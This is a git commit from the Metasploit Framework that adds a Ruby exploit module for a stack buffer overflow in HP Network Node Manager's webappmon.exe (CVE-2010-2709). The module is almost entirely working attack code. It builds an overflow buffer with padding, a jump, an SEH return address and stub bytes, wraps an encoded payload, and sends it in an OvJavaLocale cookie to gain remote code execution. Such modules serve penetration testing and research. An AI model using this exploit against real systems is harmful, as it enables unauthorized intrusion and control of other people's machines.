Added NNM webappmon.exe OvJavaLocale overflow

git-svn-id: file:///home/svn/framework3/trunk@12082 4d416f70-5f16-0410-b530-b9f4589650da
2011-03-23 03:21:56 +00:00 · 2011-03-23 03:21:56 +00:00 · 92d52daea8
parent 74e0d2f43e
commit 92d52daea8
1 changed files with 106 additions and 0 deletions
--- a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb
+++ b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb
@ -0,0 +1,106 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'        => "HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow",
+			'Description' => %q{
+				This module exploits a stack-based overflow in HP NNM's webappmon.exe.
+				The vulnerability occurs when a long string of data is sent as OvJavaLocale's
+				cookie value, OvWww.dll fails to properly do any bounds checking before this
+				input is parsed in function OvWwwDebug(), which causes an overflow when
+				sprintf_new() is called.
+			'},
+			'License'	  => MSF_LICENSE,
+			'Version'	  => "$Revision$",
+			'Author'      =>
+				[
+					'Nahuel Riva',
+					'sinn3r'
+				],
+			'References' =>
+				[
+					['CVE', '2010-2709'],
+					['OSVDB', '66932'],
+					['OSVDB', 'http://www.coresecurity.com/content/hp-nnm-ovjavalocale-buffer-overflow'],
+				],
+			'Payload'	 =>
+				{
+					'BadChars' => [*(0x00..0x09)].pack("C*") + [*(0x0a..0x0f)].pack("C*") + [*(0x10..0x1f)].pack("C*") + "\x7f",
+					'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
+					'EncoderOptions' => { "BufferRegister"=>"ECX"  }
+				},
+			'DefaultOptions' =>
+				{
+					'ExitFunction' => "seh",
+					"AutoRunScript" => "migrate -f",
+				},
+			'Platform' => 'win',
+			'Targets'	 =>
+				[
+					[ 'Windows Server 2003 Enterprise', {'Ret'=>0x5A30532D} ],
+				],
+			'Privileged'	=> false,
+			'DisclosureDate' => "Aug 3 2010"))
+
+			register_options(
+				[
+					Opt::RPORT(80),
+				], self.class)
+	end
+
+	def exploit
+
+		nops = make_nops(1000)*10
+
+		sploit  = nops[0, 7044]				#Padding
+		sploit << "\x74\x20\x42\x42"		#JE jump 0x20 bytes
+		sploit << [target.ret].pack('V')	#POP/POP/RET
+		sploit << nops[0, 26]				#Padding
+		sploit << "\x61"*13					#POPAD x 13
+		sploit << "\x51"					#PUSH ECX
+		sploit << "\xc3"					#RETN
+		sploit << nops[0, 31]				#Padding
+		sploit << payload.encoded			#Payload
+		sploit << nops[0, 10000-sploit.length]
+
+		connect
+
+		print_status("Sending malicious request...")
+		send_request_raw({
+			"uri"     => "/OvCgi/webappmon.exe",
+			"data"    => "ins=nowait&sel=A&appB=&actC=&arg=&help=&cache=1600",
+			"version" => "1.1",
+			"method"  => "GET",
+			"headers" => {
+				"Accept" => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+				"Accept-Language" => "en-us,en;q=0.5",
+				"Accept-Encoding" => "gzip,deflate",
+				"Accept-Charset" => "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
+				"Keep-Alive" => "300",
+				"Connection" => "keep-alive",
+				"Cookie" => "OvJavaLocale=#{sploit}.Cp1252;OvWebSession=14150:AnyUser%3a",
+				"Cache-Control" => "max-age=0"
+			}
+		}, 2)
+
+		handler
+		disconnect
+
+	end
+end